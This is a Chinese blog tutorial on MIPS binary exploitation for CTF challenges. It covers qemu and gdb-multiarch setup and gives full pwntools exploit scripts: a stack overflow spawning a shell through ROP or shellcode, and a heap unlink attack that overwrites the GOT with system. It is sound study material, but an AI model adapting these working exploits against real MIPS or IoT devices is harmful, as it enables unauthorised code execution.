mips-pwn

阅读数: 次 2021-11-09

字数统计: 1.3k字 | 阅读时长: 7分

mips-pwn入门

[TOC]

MIPS-PWN

qemu

1	sudo apt-get install qemu-user qemu-system

gdb-multiarch

1	sudo apt-get install gdb-multiarch

MIPS软件包

# 具备MIPS交叉编译gcc与MIPS程序动态链接库
sudo apt-get install gcc-mips-linux-gnu
sudo apt-get install gcc-mipsel-linux-gnu
sudo apt-get install gcc-mips64-linux-gnuabi64
sudo apt-get install gcc-mips64el-linux-gnuabi64

lib

lib是一个libc文件夹

里面要有两个文件，且名称有要求，

名称信息在ELF文件中，看报错信息将所给lib中的ld和libc改名即可，没给lib的话一般是常用的相关动态链接库

1 2	ld : ld-uClibc.so.0 libc : libc.so.0

寄存器

指令集

mips_arm汇编学习 - Note (gitbook.io)

启动mips程序

1 2	qemu-mipsel -g 端口号 -L lib的父文件夹路径 ./程序名 # 不给lib文件夹的话可以用/usr/mipsel-linux-gnu/

将mips程序映射到本地的某端口

(-g 端口号)去掉为直接运行

例子：

#!/usr/bin/env python3
from pwn import *

global io

local = 0
ip = '127.0.0.1'
port = 1234

# elf
arch = 'mips'
filename = 'HelloMIPS'
endian = 'little'
elf = ELF(filename)
context(os='linux', arch=arch, log_level="debug", endian=endian)


# libc
local_libc = ELF("lib/libc.so.0")
remote_libc = ELF("lib/libc.so.0")

def pwn():
    io.recvuntil(b"Hello MIPSEL.")
    io.sendline(b'/bin/sh\x00')
    io.recvuntil(b"Magic number:0x")
    system_addr=int(io.recv(8),16)
    success("system_addr:"+hex(system_addr))
    libcbase=system_addr-libc.symbols['system']
    success("libcbase:"+hex(libcbase))
    gg=libcbase+0x0000B114
    # binsh_addr=0x0440E20
    binsh_addr=libcbase+next(libc.search(b'/bin/sh\x00'))
    # io.recvuntil()
    # sleep(0.1)
    payload=b'a'*(0x104)+p32(gg)+p32(system_addr)+p32(binsh_addr)
    '''
    0x0004f198 : addiu $a0, $zero, -1 ; lw $a0, 0xac($sp) ; lw $ra, 0x138($sp) ; move $v0, $a0 ; jr $ra ; addiu $sp, $sp, 0x140
    0x0000B11C : lw $t9, ($sp) ; lw $a0, 4($sp) ; jalr $t9 ; nop
    '''
    io.sendline(payload)

def pwn2():
    io.recvuntil(b"Hello MIPSEL.")
    payload=asm("addi $t9, $sp ,-0x108 ; jalr $t9 ; nop")
    io.send(payload.ljust(0xf,b'\x00'))
    io.recvuntil(b"Magic number:0x")
    system_addr = int(io.recv(8), 16)
    success("system_addr:" + hex(system_addr))
    libcbase = system_addr - libc.symbols['system']
    success("libcbase:" + hex(libcbase))
    payload=asm(shellcraft.sh())
    payload=payload.ljust(0x104,b'a')+p32(0x0440E20)
    io.sendline(payload)

if __name__ == '__main__':
    if local == 0:
        io = process(["qemu-mipsel", "-L", "./", "./"+filename])
        libc = local_libc
        # ld = local_ld
    elif local == 1:
        io = process(["qemu-mipsel", '-g', '1234', "-L", "./", "./"+filename])
        libc = local_libc
        # ld = local_ld
    else:
        io = remote(ip, port)
        libc = remote_libc
        # ld = remote_ld

    pwn2()
    io.interactive()

gdb–multiarch动态调试

开启mips程序服务后

io=process(['gdb-multiarch',
                '--init-eval-command=file '+filename,
                '--init-eval-command=set architecture mips',
                "--init-eval-command=set endian little",
                '--init-eval-command=target remote 127.0.0.1:1234'])

然后下断点调试即可

例子：

#!/usr/bin/env python3
from pwn import *

global io

local = 1
ip = '127.0.0.1'
port = 1234

# elf
arch = 'mips'
filename = 'HelloMIPS'
elf = ELF(filename)
context(os='linux', arch=arch, endian="little")


def debug():
    io.sendline(b'b main')
    io.sendline(b'c')


if __name__ == '__main__':
    io = process(['gdb-multiarch',
                  '--init-eval-command=file ' + filename,
                  '--init-eval-command=set architecture mips',
                  "--init-eval-command=set endian little",
                  '--init-eval-command=target remote 127.0.0.1:1234'])
    debug()
    io.interactive()

ROPgadget

1	ROPgadget --binary lib/libc.so.0 --mipsrop stackfinder > gadget

IDA

1 2	mipsrop.stackfinder() mipsrop.find()

能shellcode绝不rop

由于跳转时绝大多数情况下利用$t9寄存器间接跳转，所以rop难度上升

而mips没有NX保护，shellcode难度下降

能用shellcode不用rop

managesystem

mips堆，unlink

#!/usr/bin/env python3
from pwn import *

global io

local = 0
ip = '127.0.0.1'
port = 1234

# elf
arch = 'mips'
filename = 'managesystem'
endian = 'little'
elf = ELF(filename)
context(os='linux', arch=arch, log_level="debug", endian=endian)

# libc
local_libc = ELF("/home/qingmu-z/Desktop/iot/management/lib/libc.so.0")
remote_libc = ELF("/home/qingmu-z/Desktop/iot/management/lib/libc.so.0")


def add(idx,size,payload):
    io.recvuntil(b"options >> ")
    io.sendline(b'1')
    io.recvuntil(b"Enter the user info's length: ")
    io.sendline(str(size).encode())
    io.recvuntil(b"Enter user's info: ")
    io.send(payload)

def free(idx):
    io.recvuntil(b"options >> ")
    io.sendline(b'2')
    io.recvuntil(b"Enter the index of user: ")
    io.sendline(str(idx).encode())

def edit(idx,payload):
    io.recvuntil(b"options >> ")
    io.sendline(b'3')
    io.recvuntil(b"Enter the index of user you want edit: ")
    io.sendline(str(idx).encode())
    io.recvuntil(b"The new user's info: ")
    io.send(payload)

def show(idx):
    io.recvuntil(b"options >> ")
    io.sendline(b'4')
    io.recvuntil(b"Enter the index of user you want show: ")
    io.sendline(str(idx).encode())


def pwn():
    add(0,0x54,b'aaaa')
    add(1,0x88,b'bbbb')
    add(2, 0x80, b'bbbb')
    add(3,0x80,b'sh;\x00')
    target=0x00411830
    fd=target-0xc
    bk=target-0x8
    payload=p32(0)+p32(0x51)+p32(fd)+p32(bk)+b'a'*(0x40)+p32(0x50)+p32(0x90)
    edit(0,payload)
    free(1)

    payload=p64(0)+p32(target)+p32(0x100)+p64(0)+p32(elf.got['free'])
    edit(0,payload)

    show(2)
    io.recvuntil(b"info: ")
    free_addr=u32(io.recv(4))
    libcbase=free_addr-libc.symbols['free']
    success("free_addr:"+hex(free_addr))
    success("libcbase:"+hex(libcbase))

    system_addr=libcbase+libc.symbols['system']
    success("system_addr:" + hex(system_addr))

    edit(2,p32(system_addr))

    free(3)


if __name__ == '__main__':
    if local == 0:
        io = process(["qemu-mipsel", "-L", "./", "./" + filename])
        libc = local_libc
        # ld = local_ld
    elif local == 1:
        io = process(["qemu-mipsel-static", '-g', '1234', "-L", "./", "./" + filename])
        libc = local_libc
        # ld = local_ld
    else:
        io = remote(ip, port)
        libc = remote_libc
        # ld = remote_ld

    pwn()
    io.interactive()

embedded_heap

由于用的是qemu-user运行的程序，pwndbg的vmmap没法使用，并且运行过程中调试出现玄学错误，导致无法调试，之后看看docker搭环境能否正常调试吧。

-------------本文结束感谢您的阅读-------------